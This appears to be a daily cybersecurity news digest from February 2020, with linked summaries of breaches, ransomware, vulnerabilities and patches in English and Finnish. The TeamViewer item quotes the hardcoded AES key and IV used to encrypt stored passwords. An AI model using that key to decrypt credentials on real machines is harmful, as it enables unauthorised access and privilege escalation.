Daily NCSC-FI news followup 2020-02-04

TeamViewer

whynotsecurity.com/blog/teamviewer/ TL;DR: TeamViewer stored user passwords encrypted with AES-128-CBC with they key of 0602000000a400005253413100040000 and iv of 0100010067244F436E6762F25EA8D704 in the Windows registry. If the password is reused anywhere, privilege escalation is possible. If you do not have RDP rights to machine but TeamViewer is installed, you can use TeamViewer to remote in. TeamViewer also lets you copy data or

Google launches open-source security key project, OpenSK

nakedsecurity.sophos.com/2020/02/03/google-launches-open-source-security-key-project-opensk/ Interested in using hardware security keys to log into online services more securely? Well, now you can make your own from scratch, thanks to an open-source project that Google announced last week. Read also:

www.theregister.co.uk/2020/02/04/burn_your_own_security_key_google_releases_opensk/

Twitter kiehtovan urkintaskandaalin keskellä hyökkääjä käytti Twitterin omaa rajapintaa

www.tivi.fi/uutiset/tv/0a8d560d-1578-41c3-9a84-a575bc5db6cd Hyökkääjät yhdistivät puhelinnumeroita Twitter-nimimerkkeihin. Lue myös:

threatpost.com/twitter-api-abused-to-uncover-identities/152521/,

www.zdnet.com/article/twitter-says-an-attacker-used-its-api-to-match-usernames-to-phone-numbers/,

www.theregister.co.uk/2020/02/04/twitter_phone_numbers/ ja

www.bleepingcomputer.com/news/security/twitter-fixed-issue-exploited-to-match-phone-numbers-to-accounts/

Pelottava löydös: Kiristysohjelma iskee myös teollisuuteen

www.is.fi/digitoday/tietoturva/art-2000006395169.html Tammikuussa löytynyt haittaohjelma rampauttaa teollisuusohjelmistoja muiden tihutöidensä ohella. Tietoturvatutkijat ovat löytäneet uudentyyppisen kiristyshaittaohjelman, joka ei tyydy vain tavanomaiseen tiedostojen kaappaamiseen ja salakirjoittamiseen. Tietoturvayhtiö Dragosin viime kuussa löytämä ja Ekansiksi nimeämä ohjelma pyrkii vahingoittamaan myös teollisuuden hallintajärjestelmiä. Asiasta kirjoittaa myös Ars Technica. Ekansiin on ohjelmoitu valmiiksi lista 64:stä teollisuudessa käytettävän ohjelman prosessista, jotka haittaohjelma lopettaa kun se aloittaa “tavanomaisemman” tiedostojen salakirjoittamisen ja kaappaamisen. Listalla on muun muassa Honeywellin, General Electricin ja GE Fanucin ohjelmia. Lue myös:

www.wired.com/story/ekans-ransomware-industrial-control-systems/,

www.zdnet.com/article/ransomware-attacks-are-now-targeting-industrial-control-systems/, . Sekä:

www.darkreading.com/attacks-breaches/ekans-ransomware-raises-industrial-control-worries/d/d-id/1336950,

www.tivi.fi/uutiset/tv/99d439eb-2fd3-44e9-919b-75d37a5f5154 ja

arstechnica.com/information-technology/2020/02/new-ransomware-intentionally-meddles-with-critical-infrastructure/

More dangerous vulnerabilities in Intel CPUs

www.pandasecurity.com/mediacenter/news/more-dangerous-vulnerabilities-intel-cpus/ Intel has released information about two potentially dangerous flaws in the processor architecture of its CPUs. The chip manufacturer had already provided security updates for similar gaps in May and November 2019. Although the new vulnerabilities seem to be less critical than the previous ones, side-channel attacks are still possible.

Traficom nostaa kyberturvallisuuden yritysten hallitusten agendalle

www.traficom.fi/fi/ajankohtaista/traficom-nostaa-kyberturvallisuuden-yritysten-hallitusten-agendalle Liikenne- ja viestintäviraston Kyberturvallisuuskeskuksen kokoama ylimmälle yritysjohdolle suunnattu opas auttaa turvaamaan liiketoimintaa digimaailmassa. Liikenne- ja viestintäviraston Kyberturvallisuuskeskus on julkaissut yritysten hallituksille suunnatun kyberturvallisuutta käsittelevän oppaan. Kyberturvallisuus ja yrityksen hallituksen vastuu -opas antaa työkaluja ja tukea organisaation kyberturvallisuuden parantamiseen. Lue myös:

www.kyberturvallisuuskeskus.fi/fi/kyberturvallisuus-ja-yrityksen-hallituksen-vastuu-opas

AZORult Campaign Adopts Novel Triple-Encryption Technique

threatpost.com/azorult-campaign-encryption-technique/152508/ Popular trojan is sneaking its way onto PCs via malspam campaign that uses three levels of encryption to sneak past cyber defenses. A recent wave of AZORult-laced spam caught the attention of researchers who warn that malicious attachments associated with the campaign are using a novel obfuscation technique, in an attempt to slip past spam gateways and avoid client-side antivirus detection.

Microsoft Teams goes down after Microsoft forgot to renew a certificate

www.theverge.com/2020/2/3/21120248/microsoft-teams-down-outage-certificate-issue-status Microsoft Teams went down this morning for nearly three hours after Microsoft forgot to renew a critical security certificate. Users of Microsoft’s Slack competitor were met with error messages attempting to sign into the service on Monday morning, with the app noting it had failed to establish an HTTPS connection to Microsoft’s servers. Read also:

www.tivi.fi/uutiset/tv/4bc9f354-866a-4f48-852b-14b888eae811

School’s out as ransomware attack downs IT systems at Scotland’s Dundee and Angus College

www.theregister.co.uk/2020/02/04/dundee_angus_college_ransomware/ A further education college in east Scotland has been struck by what its principal described as a cyber “bomb” in an apparent ransomware attack so bad that students have been told to stay away and reset passwords en masse.

Ashley Madison Breach Extortion Scam Targets Hundreds

threatpost.com/ashley-madison-breach-extortion-scam-targets-hundreds/152481/ A new extortion attack has targeted hundreds of users affected by the Ashley Madison breach over the past week. Nearly five years after the high-profile Ashley Madison data breach, hundreds of impacted website users are being targeted by a new extortion attack this past week. The 2015 data breach of the adultery website led to 32 million accounts being publicly dumped online, including victims’ names, passwords, phones numbers, credit card information and more. Up to a year after the hack, researchers with Kaspersky said that affected users were still being hit with an array of attacks, from credit card scams to spam emails. Now, cybercriminals are exploiting the treasure trove of breached Ashley Madison data again in a new highly-personalized and targeted attacks. According researchers at Vade Secure, extortionist are sending emails targeting affected Ashley Madison users once again.

New EmoCheck Tool Checks if You’re Infected With Emotet

www.bleepingcomputer.com/news/security/new-emocheck-tool-checks-if-youre-infected-with-emotet/ A new utility has been released by Japan CERT (computer emergency response team) that allows Windows users to easily check if they are infected with the Emotet Trojan. The Emotet Trojan is one of the most actively distributed malware that is spread through phishing emails with malicious Word document attachments. Read also:

github.com/JPCERTCC/EmoCheck

Office 365 to Block Harmful Content Regardless of Custom Configs

www.bleepingcomputer.com/news/security/office-365-to-block-harmful-content-regardless-of-custom-configs/ Microsoft is currently working on new features designed to block malicious content in Office 365 regardless of the custom configurations set up by administrators or users unless manually overridden.

Google Bug Sent Private Google Photos Videos to Other Users

www.bleepingcomputer.com/news/google/google-bug-sent-private-google-photos-videos-to-other-users/ In a serious privacy lapse, Google is notifying users that videos stored in their Google Photos account were mistakenly shared with other unrelated users. Read also:

thehackernews.com/2020/02/google-photos-videos.html

Teen takes down ISP with DDoS attacks to get info on one of its subscribers

www.zdnet.com/article/teen-takes-down-isp-with-ddos-attacks-to-get-info-on-one-of-its-subscribers/ Ukrainian police have arrested a 16-year-old from the city of Odessa last month for attempting to extort a local ISP (internet service provider) into sharing data on one of its subscribers. Ukrainian authorities say that when the service provider declined, the teen used distributed denial of service (DDoS) attacks to take down the ISP’s network.

These are the top ten software flaws used by crooks: Make sure you’ve applied the patches

www.zdnet.com/article/these-are-the-top-ten-software-flaws-used-by-crooks-make-sure-youve-applied-the-patches/ Hackers are exploiting many of the same security vulnerabilities as last year and they all impact Microsoft Windows products – but a bug in Adobe Flash was the most exploited in 2019. Over half of the most common security vulnerabilities exploited by criminals to conduct cyber attacks and distribute malware are more than a year old, and some are over five years old, demonstrating how failure to apply security updates is leaving organisations vulnerable to hacking and malicious compromise.

FBI catches hacker that stole Nintendo’s secrets for years

arstechnica.com/gaming/2020/02/fbi-catches-hacker-that-stole-nintendos-secrets-for-years/ A 21-year-old California man has pleaded guilty to hacking Nintendo’s servers multiple times since 2016, using phishing techniques to gain early access to information about the company’s plans. Read also:

www.scmagazine.com/home/security-news/cybercrime/hacker-pleads-guilty-to-stealing-nintendo-secrets/ and

www.bleepingcomputer.com/news/security/nintendo-hacker-pleads-guilty-to-child-porn-charges-faces-25-years/

Electric scooters vulnerable to remote hacks

www.welivesecurity.com/2020/02/04/electric-scooters-vulnerable-remote-hacks/ Electric scooters are steadily becoming a popular alternative for short commutes. Besides convenience, however, they also introduce a range of cybersecurity and privacy risks, according to a study by the University of Texas at San Antonio (UTSA). The review which UTSA said is “the first review of the security and privacy risks posed by e-scooters and their related software services and applications” outlines various attacks scenarios that riders might face, as well as how to tackle the risks. Many e-scooters rely on a combination of Bluetooth Low Energy (BLE) and the rider’s smartphone internet connection to run, as well as send data to the service provider. This opens up a number of avenues for potential attacks. For example, bad actors could eavesdrop on the data being broadcasted, which could, in turn, lead to Man-in-the-Middle (MitM) and replay attacks. Those could allow hackers to

WhatsApp Bug Allowed Attackers to Access the Local File System

www.bleepingcomputer.com/news/security/whatsapp-bug-allowed-attackers-to-access-the-local-file-system/ Facebook patched a critical WhatsApp vulnerability that would have allowed potential attackers to read files from a user’s local file system, on both macOS and Windows platforms. Read also:

www.facebook.com/security/advisories/cve-2019-18426

Medtronic Patches Implanted Device, CareLink Programmer Bugs

threatpost.com/medtronic-patches-implanted-device-carelink/152533/ Medtronic has released updates to address known vulnerabilities in its line of connected medical devices that were initially disclosed last year and in 2018. The vendor has addressed two sets of bugs. The first group, disclosed in March of last year, is found in a range of Medtronic implanted cardiac resynchronization therapy with defibrillation (CRT-D) devices; and in multiple implantable cardioverter defibrillators (ICDs). An ICS-CERT advisory last week gives the most severe of the flaws a CVSS “critical” severity rating of 9.3.

threatpost.com/medtronic-patches-implanted-device-carelink/152533/

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.